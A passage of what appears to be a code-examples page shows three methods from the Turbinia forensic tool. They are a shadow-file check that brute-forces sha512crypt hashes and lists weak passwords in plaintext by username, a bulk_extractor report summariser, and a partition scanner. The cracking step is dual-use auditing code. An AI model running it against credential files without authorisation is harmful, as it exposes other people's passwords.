      hashes (dict): dict of hashes to usernames
      timeout (int): Time in seconds to run password bruteforcing.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = 'No weak passwords found'
        priority = Priority.LOW

        # 1800 is "sha512crypt $6$, SHA512 (Unix)"
        weak_passwords = bruteforce_password_hashes(shadow,
                                                    tmp_dir=self.tmp_dir,
                                                    timeout=timeout,
                                                    extra_args='-m 1800')

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Shadow file analysis found {0:n} weak password(s)'.format(
                len(weak_passwords))
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                line = """User '{0:s}' with password '{1:s}'""".format(
                    hashes[password_hash], plaintext)
                report.append(fmt.bullet(line, level=2))
        report = '\n'.join(report)
        return (report, priority, summary)
Example #22
  def generate_summary_report(self, output_file_path):
    """Generate a summary report from the resulting bulk extractor run.

    Args:
      output_file_path(str): the path to the bulk extractor output.

    Returns:
      tuple: containing:
        report_text(str): The report data
        summary(str): A summary of the report (used for task status)
    """
    findings = []
    features_count = 0
    report_path = os.path.join(output_file_path, 'report.xml')

    # Bail out if bulk_extractor did not generate report.xml.
    if not os.path.exists(report_path):
      report = 'Execution successful, but the report is not available.'
      return (report, report)

    # Parse existing XML file.
    self.xml = xml_tree.parse(report_path)

    # Wrap in try/except so execution continues when an attribute
    # is not found and NoneType is returned.
    try:
      # Retrieve summary related results.
      findings.append(fmt.heading4('Bulk Extractor Results'))
      findings.append(fmt.heading5('Run Summary'))
      findings.append(
          fmt.bullet(
              'Program: {0} - {1}'.format(
                  self.check_xml_attrib('creator/program'),
                  self.check_xml_attrib('creator/version'))))
      findings.append(
          fmt.bullet(
              'Command Line: {0}'.format(
                  self.check_xml_attrib(
                      'creator/execution_environment/command_line'))))
      findings.append(
          fmt.bullet(
              'Start Time: {0}'.format(
                  self.check_xml_attrib(
                      'creator/execution_environment/start_time'))))
      findings.append(
          fmt.bullet(
              'Elapsed Time: {0}'.format(
                  self.check_xml_attrib('report/elapsed_seconds'))))

      # Retrieve results from each of the scanner runs
      feature_files = self.xml.find('feature_files')
      if feature_files is not None:
        feature_iter = feature_files.iter()
        findings.append(fmt.heading5('Scanner Results'))
        for f in feature_iter:
          if f.tag == 'feature_file':
            name = next(feature_iter)
            count = next(feature_iter)
            findings.append(fmt.bullet('{0}:{1}'.format(name.text, count.text)))
            features_count += int(count.text)
      else:
        findings.append(fmt.heading5("There are no findings to report."))
    except AttributeError as exception:
      log.warning(
          'Error parsing feature from Bulk Extractor report: {0!s}'.format(
              exception))
    summary = '{0} artifacts have been extracted.'.format(features_count)
    report = '\n'.join(findings)
    return (report, summary)
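check_xml_attrib is not shown on this page. A minimal sketch consistent with how it is called above, assuming self.xml holds the parsed ElementTree (findtext returns the supplied default when the tag path is absent, which keeps the report readable on partial XML):

    def check_xml_attrib(self, xml_key):
        """Sketch: fetches the text of a tag path from the parsed report.xml."""
        return self.xml.findtext(xml_key, default='No value found.')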
Example #23
    def run(self, evidence, result):
        """Scan a raw disk for partitions.

    Args:
      evidence (Evidence object):  The evidence we will process.
      result (TurbiniaTaskResult): The object to place task results into.

    Returns:
      TurbiniaTaskResult object.
    """
        # TODO(dfjxs): Use evidence name instead of evidence_description (#718)
        evidence_description = None
        if hasattr(evidence, 'embedded_path'):
            evidence_description = ':'.join(
                (evidence.disk_name, evidence.embedded_path))
        elif hasattr(evidence, 'disk_name'):
            evidence_description = evidence.disk_name
        else:
            evidence_description = evidence.source_path

        result.log(
            'Scanning [{0:s}] for partitions'.format(evidence_description))

        path_specs = []
        success = False

        try:
            path_specs = partitions.Enumerate(evidence)
            status_summary = 'Found {0:d} partition(s) in [{1:s}]:'.format(
                len(path_specs), evidence_description)

            # Debug output
            path_spec_debug = ['Base path specs:']
            for path_spec in path_specs:
                path_spec_types = [path_spec.type_indicator]
                child_path_spec = path_spec
                while child_path_spec.HasParent():
                    path_spec_types.insert(
                        0, child_path_spec.parent.type_indicator)
                    child_path_spec = child_path_spec.parent
                path_spec_debug.append(' | '.join(
                    ('{0!s}'.format(path_spec.CopyToDict()),
                     ' -> '.join(path_spec_types))))
            log.debug('\n'.join(path_spec_debug))
        except dfvfs_errors.ScannerError as e:
            status_summary = 'Error scanning for partitions: {0!s}'.format(e)

        status_report = [fmt.heading4(status_summary)]

        try:
            for path_spec in path_specs:
                partition_evidence, partition_status = self._ProcessPartition(
                    path_spec)
                status_report.extend(partition_status)
                result.add_evidence(partition_evidence, evidence.config)

            status_report = '\n'.join(status_report)
            success = True
        except TurbiniaException as e:
            status_summary = 'Error enumerating partitions: {0!s}'.format(e)
            status_report = status_summary

        result.log(
            'Scanning of [{0:s}] is complete'.format(evidence_description))

        result.report_priority = Priority.LOW
        result.report_data = status_report
        result.close(self, success=success, status=status_summary)

        return result